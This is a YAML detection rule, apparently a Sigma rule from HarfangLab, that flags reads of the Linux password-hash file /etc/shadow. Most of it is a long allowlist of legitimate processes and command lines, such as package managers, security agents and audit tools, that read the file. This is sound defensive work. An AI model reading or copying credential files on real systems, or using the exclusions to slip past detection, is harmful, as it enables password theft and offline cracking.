"content": "title: File /etc/shadow Read\nid: 4af5cd27-b69e-4679-a1b5-b6f72cc439aa\ndescription: |\n Detects an attempt to read /etc/shadow.\n This file contains the encrypted passwords of all the accounts on the system.\n The content of this file is often used to gather information about the system and for offline password cracking.\n It is recommended to ensure that the process accessing this file is legitimate and that it will keep its content secret.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/16\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Path: '/etc/shadow'\n ProcessParentImage|contains: '?'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '*/systemd'\n - '*/sudo'\n - '*/su'\n - '*/sshd'\n - '*/cron'\n - '/usr/sbin/in.rshd'\n - '/usr/sbin/crond'\n - '/usr/bin/crond'\n - '/usr/bin/crontab'\n - '*/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '*/polkit-agent-helper-?'\n - '/usr/lib/x86_64-linux-gnu/sddm/sddm-helper'\n - '/usr/sbin/smbd'\n - '/usr/sbin/lightdm'\n - '/usr/libexec/accounts-daemon'\n - '/bin/login'\n - '/usr/bin/login'\n - '/usr/sbin/usermod'\n - '/usr/sbin/useradd'\n - '/usr/sbin/userdel'\n - '/usr/bin/passwd'\n - '/usr/bin/chage'\n - '/usr/sbin/pwck'\n - '/usr/bin/chsh'\n - '/usr/bin/chfn'\n - '/usr/bin/clamscan'\n - '/usr/sbin/xrdp-sesman'\n - '/usr/bin/newgrp'\n - '/usr/lib/openssh/sftp-server'\n - '/usr/lib/openssh/sshd-session'\n - '/usr/local/libexec/sshd-session'\n - '/usr/libexec/openssh/sshd-session'\n - '/usr/lib/ssh/sshd-session'\n - 
'/usr/libexec/ssh/sshd-session'\n - '/sbin/apk'\n - '/usr/sbin/atd'\n - '/usr/bin/id'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/lib/systemd/systemd-userwork'\n - '/usr/sbin/chpasswd'\n - '/bin/chpasswd'\n - '/lib/systemd/systemd-logind'\n - '/usr/lib/systemd/systemd-logind'\n - '/usr/bin/systemd-tmpfiles'\n - '/usr/bin/pwck'\n - '/usr/lib/kscreenlocker_greet'\n - '/usr/lib/sddm/sddm-helper'\n - '/usr/bin/systemd-sysusers'\n - '/usr/libexec/xfce4-screensaver-dialog'\n - '/usr/lib/x86_64-linux-gnu/libexec/kcheckpass'\n - '/usr/sbin/gdm3'\n - '/usr/bin/git'\n - '/usr/bin/screen'\n - '/usr/lib/systemd/systemd-executor'\n - '/usr/bin/cupsd'\n - '/usr/sbin/cupsd'\n - '/usr/bin/mono-sgen'\n - '/usr/sbin/openvpn'\n - '/usr/lib/accounts-daemon'\n - '/usr/bin/runuser'\n - '/usr/sbin/runuser'\n - '/usr/bin/pwhistory_helper'\n - '/usr/sbin/pwhistory_helper'\n - '/usr/bin/getent'\n - '/usr/libexec/packagekitd'\n - '/usr/lib/dovecot/auth'\n - '/usr/NX/bin/nxexec'\n - '/usr/libexec/openscap/probe_shadow'\n - '/usr/lib/x86_64-linux-gnu/openscap/probe_shadow'\n - '/usr/bin/oscap'\n - '/usr/lib/x86_64-linux-gnu/openscap/probe_textfilecontent54'\n - '/usr/bin/xtrlock'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/schroot'\n - '/usr/bin/lslogins'\n - '/usr/sbin/freeradius'\n - '/usr/bin/mksquashfs'\n - '/usr/sbin/sshd-knock'\n - '/usr/bin/rsync'\n - '/usr/bin/greetd'\n - '/usr/sbin/pure-ftpd-virtualchroot'\n - '/usr/sbin/selinux_helper'\n - '/usr/sbin/lid'\n - '/usr/lib/x86_64-linux-gnu/xrdp/xrdp-sesexec'\n - '/usr/bin/md5sum'\n - '/usr/bin/sha1sum'\n - '/usr/bin/sha256sum'\n - '/usr/sbin/saslauthd'\n\n exclusion_image:\n ProcessImage:\n - '/usr/lib/rstudio-server/bin/rserver-pam'\n - '/usr/lib/rstudio-server/bin/rserver-launcher'\n - '/usr/local/manageengine/uems_agent/bin/dctaskengine'\n - '/usr/openv/netbackup/bin/bpdbsbora'\n - '/opt/jc/bin/jcosqueryi'\n - '*/sqllib/adm/db2syscr'\n - '/opt/mqm/bin/security/amqoamax'\n - 
'/opt/grid/*/perl/bin/perl'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/nessus_agent/sbin/nessus-agent-module'\n - '/opt/VRTSperl/bin/perl'\n - '/opt/VRTSsfmh/bin/perl'\n - '/opt/netbackup/openv/netbackup/bin/bpbkar'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/Druva/EnterpriseWorkloads/bin/PhoenixFSDtBackupAgent'\n - '/opt/universal/ubroker/sbin/cskern'\n - '/usr/local/ipdiva/cleanroom/sbin/xrdp-sesman'\n - '/opt/psa/admin/sbin/sys_auth'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/bin/make|'\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/opt/a5000/infra/utils/bin/osconfexec|' # Mitel\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage:\n - '/usr/bin/apt'\n - '/usr/bin/apt-get'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp1:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_cmp2:\n ProcessCurrentDirectory: '/var/backups/'\n ProcessCommandLine: 'cmp -s shadow.bak /etc/shadow'\n exclusion_yum:\n - 
ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_debconf_1:\n - ProcessCommandLine:\n - '/usr/bin/perl*/usr/share/debconf/frontend /sbin/update-secureboot-policy *'\n - '/usr/bin/perl*/usr/share/debconf/frontend /usr/sbin/update-grub-legacy-ec2'\n - '/usr/bin/perl*/usr/share/debconf/frontend /usr/sbin/needrestart*'\n - '/usr/bin/perl*/bin/debconf-communicate -fnoninteractive update-notifier'\n - '/usr/bin/perl*/usr/share/debconf/frontend /usr/sbin/pam-auth-update --force --package'\n - ProcessParentCommandLine:\n - '/usr/bin/python3 /usr/bin/unattended-upgrade'\n - '/usr/bin/python3 /usr/lib/update-notifier/package-data-downloader'\n\n exclusion_debconf_2:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n\n exclusion_authconfig:\n ProcessCommandLine:\n - '/usr/bin/python /sbin/authconfig'\n - '/usr/bin/python? 
/sbin/authconfig'\n\n exclusion_gdm:\n ProcessCommandLine: 'gdm-session-worker [pam/gdm-*]'\n exclusion_dkms:\n - ProcessCommandLine|contains: '/usr/sbin/dkms'\n - ProcessParentCommandLine|contains: '/usr/sbin/dkms'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dkms'\n exclusion_cron_daily_passwd:\n ProcessCommandLine:\n - 'cmp -s shadow.bak /etc/shadow'\n - 'cp -p /etc/shadow shadow.bak'\n ProcessParentCommandLine: '/bin/sh /etc/cron.daily/passwd'\n exclusion_eset:\n ProcessImage|startswith: '/opt/eset/'\n exclusion_deepsecurity:\n ProcessImage|startswith: '/opt/ds_agent/'\n exclusion_auditbeat:\n ProcessImage|endswith: '/auditbeat'\n exclusion_fusioninventory:\n - ProcessName: 'fusioninventory-agent'\n - ProcessCommandLine|contains: 'fusioninventory-agent'\n exclusion_sap:\n - ProcessImage:\n - '*/sapuxuserchk'\n - '/usr/sap/hostctrl/exe/sapdbctrl'\n - ProcessParentImage|endswith: '/saphostexec'\n exclusion_hana:\n ProcessImage|endswith: '/sdbrun'\n exclusion_proftpd:\n ProcessImage|endswith: '/proftpd'\n exclusion_vmware:\n ProcessImage|endswith: '/vmtoolsd'\n exclusion_aide:\n ProcessImage|endswith: '/aide'\n exclusion_mcafee:\n ProcessImage|startswith: '/opt/McAfee/'\n exclusion_netbackup:\n ProcessImage|endswith:\n - '/nbatd'\n - '/nbtelesched'\n - '/netb'\n - '/nbtelemetry'\n - '/bpjava-msvc'\n exclusion_landscape:\n - ProcessCommandLine|contains: '/usr/bin/landscape-client'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/landscape-client'\n - '/usr/bin/python3 /usr/bin/landscape-client'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/landscape-client'\n exclusion_gcworker:\n ProcessImage: '/opt/GC_Service/GC/gc_worker'\n exclusion_cockpit:\n - ProcessImage: '/usr/lib/cockpit/cockpit-session'\n - ProcessParentImage: '/usr/libexec/cockpit-session'\n - ProcessAncestors|contains: '|/usr/libexec/cockpit-session|'\n exclusion_vsftpd:\n ProcessImage: '/usr/sbin/vsftpd'\n exclusion_pgsql:\n ProcessParentCommandLine|contains: 'sh 
/usr/share/postgresql-common/pg_updateaptconfig'\n exclusion_pgisready:\n - ProcessCommandLine: '/usr/bin/perl /usr/bin/pg_isready'\n - ProcessCommandLine|startswith: '/usr/bin/perl /usr/bin/pg_isready '\n - ProcessParentCommandLine|startswith: '/bin/sh -c pg_isready '\n exclusion_pg:\n ProcessCommandLine|startswith:\n - '/usr/lib/postgresql/*/bin/psql '\n - '/usr/bin/perl /usr/bin/pg_dump '\n - '/usr/lib/postgresql/??/bin/pg_restore '\n - '/usr/lib/postgresql/??/bin/pg_dumpall'\n - '/usr/bin/perl /usr/bin/pg_dumpall'\n - '/usr/bin/perl -wT /usr/bin/pg_lsclusters '\n - '/usr/bin/perl -w /usr/bin/pg_createcluster '\n - '/usr/bin/perl -wT /usr/bin/pg_upgradecluster '\n - '/usr/bin/perl /bin/pg_restore '\n exclusion_glpi_agent1:\n ProcessImage:\n - '/usr/bin/perl'\n - '/snap/glpi-agent/*/usr/share/glpi-agent/bin/perl'\n ProcessCommandLine|contains:\n - 'glpi-agent'\n - '/usr/bin/perl /usr/bin/glpi-inventory'\n exclusion_glpi_agent2:\n ProcessCommandLine: 'glpi-agent (tag *): waiting'\n exclusion_psql:\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/bin/psql'\n - '/usr/bin/perl -w /usr/bin/psql'\n exclusion_netatalk:\n ProcessImage:\n - '/usr/sbin/afpd'\n - '/usr/local/sbin/afpd'\n ProcessParentImage:\n - '/usr/sbin/afpd'\n - '/usr/local/sbin/afpd'\n exclusion_x2go:\n - ProcessCommandLine:\n - '/usr/bin/perl /usr/bin/x2golistsessions'\n - '/usr/bin/perl -XU /usr/lib/x2go/libx2go-server-db-sqlite3-wrapper.pl *'\n - '/usr/bin/perl /usr/lib/x2go/x2golistsessions_sql *'\n - ProcessParentCommandLine:\n - '/usr/bin/perl /usr/sbin/x2gocleansessions'\n - '/usr/bin/perl /usr/bin/x2gosessionlimit'\n - '/bin/bash /usr/bin/x2gosuspend-session*'\n - '/bin/bash /usr/bin/x2goruncommand*'\n - ProcessGrandparentCommandLine: '/usr/bin/perl /usr/sbin/x2gocleansessions'\n exclusion_omiserver:\n ProcessImage: '/opt/omi/bin/omiserver'\n exclusion_laps_1:\n ProcessCommandLine: '/bin/bash /usr/local/sbin/laps'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n exclusion_laps_2:\n 
ProcessCommandLine: '/bin/bash /usr/local/libexec/laps'\n exclusion_qualys1:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n exclusion_qualys2:\n ProcessCommandLine:\n - 'grep ^root:[\\*!]: /etc/shadow'\n - 'grep -E ^\\\\+: /etc/shadow'\n - 'grep -E ^root:[\\\\\\*\\\\!]: /etc/shadow'\n - 'grep -E ^[[:blank:]]\\*\\\\+ /etc/shadow'\n - 'grep -E ^[^:]+:[^\\\\!\\*] /etc/shadow'\n - '/bin/sh /usr/bin/egrep ^[^:]+:[^\\\\!\\*] /etc/shadow'\n - 'awk -F: {print $1?:?$5} /etc/shadow'\n - 'awk -F: ($2 == \"\"){print \"/etc/shadow:\"$1\":Second field is empty\"} /etc/shadow'\n - 'awk -F: -v user=* {if ($1==user) print $1\":\"$7} /etc/shadow'\n # awk -F: {if (NR==FNR){if ($2 ~ /^(\\!|\\*)/) a[$1]=\"locked\"; else a[$1]=\"active\"} else {if($7 ==\"/sbin/nologin\" && a[$1] == \"locked\"){a[$1]=\"disabled\";} print $1\":\"a[$1]\":\"$7}} /etc/shadow /etc/passwd\n # awk -F: {if (NR==FNR){if ($2 ~ /^(\\!|\\*)/) a[$1]=\"locked\"; else a[$1]=\"unlocked\"} else if($3 < 500 && $1 != \"root\") {print $1\":\"a[$1]\":\"$7}} /etc/shadow /etc/passwd\n - 'awk -F: {if (NR==FNR){if ($2 ~ *$7}} /etc/shadow /etc/passwd'\n ProcessParentImage:\n - '/usr/bin/dash'\n - '/usr/bin/bash'\n ProcessGrandparentImage:\n - '/usr/bin/dash'\n - '/usr/bin/bash'\n exclusion_qme:\n ProcessImage: '/opt/impser/vpom/bin/qme'\n exclusion_update-notifier:\n ProcessCommandLine: '/usr/bin/perl -w /bin/debconf-communicate -fnoninteractive update-notifier'\n ProcessGrandparentCommandLine: '/bin/sh /etc/cron.daily/update-notifier-common'\n exclusion_zimbra:\n ProcessCommandLine|startswith: '/usr/bin/perl -w /opt/zimbra/libexec/zmstat-fd'\n exclusion_pg_ctlcluster:\n ProcessCommandLine:\n - '/usr/bin/perl -wT /usr/bin/pg_ctlcluster *'\n - '/usr/bin/perl -wT /usr/bin/pg_lsclusters -h'\n - '/usr/bin/perl -wT /usr/bin/pg_lsclusters'\n exclusion_oracle1:\n - ProcessImage|endswith:\n - '/app/grid/perl/bin/perl'\n - 
'/app/grid/19*/perl/bin/perl'\n - ProcessCommandLine|contains:\n - '/u01/app/*/bin/acfsload'\n - '/u01/app/*/perl/bin/perl* acfsload'\n - '/orabin/grid/*/perl/bin/perl* acfsload'\n - '/orabin/grid/*/perl/bin/perl* diagsnap'\n - '/u01/app/oracle/*/sbin/nmo'\n - '/app/oracle/product/agent_*/agent_*/sbin/nmo'\n - '/usr/lib/oracle/agent/agent_*/sbin/nmo'\n - 'perl /app/oracle.ahf/'\n - 'perl /opt/ahf/oracle.ahf/'\n - '/bin/perl /opt/oracle*/tfa/'\n - '/bin/perl /oracle*/tfa/'\n - '/u01/app/*/grid/tfa/*/tfa_home/bin/tfactl.pl'\n\n exclusion_oracle2:\n ProcessCommandLine|contains: '/bin/jssu -childpidfile'\n ProcessParentImage: '*/bin/oracle'\n ProcessGrandparentImage: '/usr/lib/systemd/systemd'\n exclusion_rshd:\n ProcessImage: '/usr/sbin/in.rshd'\n ProcessParentImage: '/usr/sbin/xinetd'\n exclusion_udscan:\n ProcessImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n exclusion_man-db:\n ProcessParentCommandLine: '/bin/sh /var/lib/dpkg/info/man-db.postinst triggered /usr/share/man'\n exclusion_landscapemanager:\n ProcessCommandLine|contains: '/usr/bin/landscape-manager'\n exclusion_plesk:\n ProcessImage: '/usr/local/psa/admin/sbin/sys_auth'\n exclusion_bladelogic:\n ProcessAncestors|contains: '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n exclusion_nagios:\n - ProcessImage: '/usr/sbin/nrpe'\n - ProcessAncestors|contains: '|/usr/sbin/nrpe|'\n - ProcessCommandLine: '/bin/sh */nagios/libexec/'\n exclusion_idataagent:\n ProcessImage:\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n # https://github.com/microsoft/OMS-Agent-for-Linux\n exclusion_omsagent:\n ProcessCommandLine: '/opt/microsoft/omsagent/plugin/omsbaseline -d /opt/microsoft/omsagent/plugin/'\n ProcessGrandparentCommandLine: 'sh -c sleep 60 && /opt/microsoft/omsagent/plugin/omsbaseline -d /opt/microsoft/omsagent/plugin/'\n exclusion_popularity-contest:\n ProcessCommandLine: '/usr/bin/perl -w /usr/sbin/popularity-contest --su-nobody'\n exclusion_proxmox_backup:\n 
ProcessCommandLine: '/usr/lib/x86_64-linux-gnu/proxmox-backup/proxmox-backup-api'\n ProcessParentCommandLine: '/sbin/init'\n exclusion_slapd:\n ProcessCommandLine: '/bin/bash /usr/local/openldap/sbin/slapd-cli status'\n exclusion_updatedb:\n ProcessCommandLine: '/bin/sh /bin/updatedb.findutils'\n exclusion_esmith:\n ProcessCommandLine|contains:\n - '/usr/bin/perl /sbin/e-smith/'\n - '/usr/bin/perl /etc/e-smith/'\n - '/usr/bin/perl -w /etc/e-smith/'\n - '/usr/bin/perl -w /sbin/e-smith/'\n exclusion_miteam:\n ProcessCommandLine: '/usr/bin/perl /etc/cron.monthly/sas-miteam-expiry-notify'\n exclusion_mvf:\n ProcessCommandLine: '/usr/bin/perl /usr/mvf/bin/mvf-monitoring-tool'\n exclusion_ucserver:\n ProcessCommandLine: '/usr/bin/perl /etc/cron.daily/ucserver-miteam-stats-writer'\n\n # VT says distributed by vmware\n exclusion_vmware_at:\n ProcessImage:\n - '/usr/bin/at'\n - '/usr/bin/atd'\n exclusion_sapinst:\n ProcessCommandLine:\n - '/tmp/sapinst_exe.*.*/sapinstexe'\n - '/tmp/sapinst_exe.*.*/sapwebdisp pf=webdisp.pfl'\n exclusion_ade:\n ProcessCommandLine: 'bash -c sudo /usr/local/scripts/start_ade'\n exclusion_openldap:\n ProcessCommandLine|startswith: '/bin/bash /usr/local/openldap/sbin/slapd-cli'\n exclusion_eftpd:\n ProcessCommandLine:\n - 'eftpd -l -a -A -U backbone -F /opt/tx/fifo/eftp.fifo -c /opt/tx/conf/eftpd.conf'\n - 'eftpd -l -F /opt/tx/fifo/eftp.fifo -c /opt/tx/conf/eftpd.conf'\n exclusion_ttp:\n ProcessCommandLine|startswith: '/iiidb/software/tpp/bin/perl /iiidb/csd/itechmaint'\n exclusion_deepinstinct:\n ProcessCommandLine: '/opt/deepinstinct/bin/DeepManagementService'\n exclusion_zenidoc:\n ProcessCommandLine: 'screen -dmS *listen_o20.sh /zenidoc/zenreco/*/listen_o20.sh *'\n exclusion_webmin:\n ProcessCommandLine: '/usr/bin/perl */webmin/miniserv.pl*'\n\n exclusion_xinet:\n ProcessCommandLine: '/usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat'\n exclusion_rsync:\n ProcessCommandLine: 'bash -c sudo -u root rsync --server -* 
--log-format=%i --delay-updates . *'\n\n exclusion_lynis:\n ProcessParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis audit system --cronjob'\n - '/bin/sh /usr/bin/lynis --quick --no-colors*'\n - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n exclusion_oar:\n # /usr/bin/perl /usr/lib/oar/sarko\n # /usr/bin/perl /usr/lib/oar/Almighty\n # /usr/bin/perl /usr/lib/oar/NodeChangeState\n # /usr/bin/perl /usr/lib/oar/oar_meta_sched\n # /usr/bin/perl /usr/lib/oar/finaud\n # /usr/bin/perl /usr/lib/oar/Leon\n # /usr/bin/perl /usr/lib/oar/oaraccounting\n # /usr/bin/perl /usr/lib/oar/bipbip *\n # /usr/bin/perl /usr/lib/oar/oarsub *\n # /usr/bin/perl /usr/lib/oar/oardel *\n # /usr/bin/perl /usr/lib/oar/oarnodesetting *\n # /usr/bin/perl -w /usr/lib/oar/oarstat -u\n # /usr/bin/perl -w /usr/lib/oar/oarstat -u *\n # /usr/bin/perl -w /usr/lib/oar/oarapi.pl\n # /usr/bin/perl /usr/lib/oar//schedulers/oar_sched_gantt_with_timesharing_and_fairsharing_and_quotas *\n # /usr/bin/perl /usr/sbin/oar-database --check\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/lib/oar/'\n - '/usr/bin/perl -w /usr/lib/oar/'\n - '/usr/bin/perl /usr/sbin/oar-'\n\n exclusion_spamd:\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/sbin/spamd'\n - '/usr/bin/perl -T -w /usr/sbin/spamd'\n\n exclusion_pure_ftpd:\n ProcessImage: '/usr/sbin/pure-ftpd'\n\n exclusion_rudder:\n - ProcessImage: '/opt/rudder/bin/cf-agent'\n - ProcessParentImage: '/opt/rudder/bin/cf-agent'\n - ProcessGrandparentImage: '/opt/rudder/bin/cf-agent'\n\n exclusion_rapid7:\n ProcessImage: '/opt/rapid7/ir_agent/components/insight_agent/*/ir_agent'\n\n exclusion_oarssh:\n ProcessCommandLine: 'perl - * oarexec'\n ProcessParentCommandLine: '/usr/sbin/sshd -f /etc/oar/sshd_config -o pidfile=/var/run/oar-node_sshd.pid -r'\n ProcessParentImage: '/usr/sbin/sshd'\n\n exclusion_tina:\n ProcessCommandLine:\n - 
'/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_mitel:\n ProcessCommandLine: '/usr/bin/perl /opt/intertel/bin/uca_deployu_notifier.pl'\n\n exclusion_tiger:\n ProcessGrandparentCommandLine|startswith: '/bin/sh /usr/lib/tiger/'\n\n exclusion_omv_engined:\n - ProcessGrandparentCommandLine: 'omv-engined'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/omv-engined'\n\n exclusion_rkhunter:\n - ProcessParentCommandLine|contains: '/bin/rkhunter '\n - ProcessGrandparentCommandLine|contains: '/bin/rkhunter '\n\n exclusion_puppet:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessParentImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|contains:\n - '/usr/bin/puppet agent'\n - 'puppet agent: applying configuration'\n\n exclusion_gitlab_ruby:\n ProcessImage: '/opt/gitlab/embedded/bin/ruby'\n\n exclusion_cybereason:\n ProcessImage: '/opt/cybereason/sensor/bin/cbram'\n\n exclusion_patrol_agent:\n ProcessImage: '/opt/patrol/*/linux-*/bin/patrolagent'\n\n exclusion_microsoft_wdavdaemon:\n ProcessImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n\n exclusion_lfd:\n ProcessCommandLine:\n - '/usr/bin/perl /usr/sbin/lfd'\n - 'lfd - sleeping'\n\n exclusion_crowdstrike:\n ProcessImage|startswith: '/opt/crowdstrike/falcon-sensor'\n\n exclusion_ossec:\n - ProcessImage: '/var/ossec/bin/ossec-syscheckd'\n - ProcessCommandLine:\n - '/var/ossec/bin/wazuh-syscheckd'\n - '/var/ossec/bin/wazuh-modulesd'\n\n 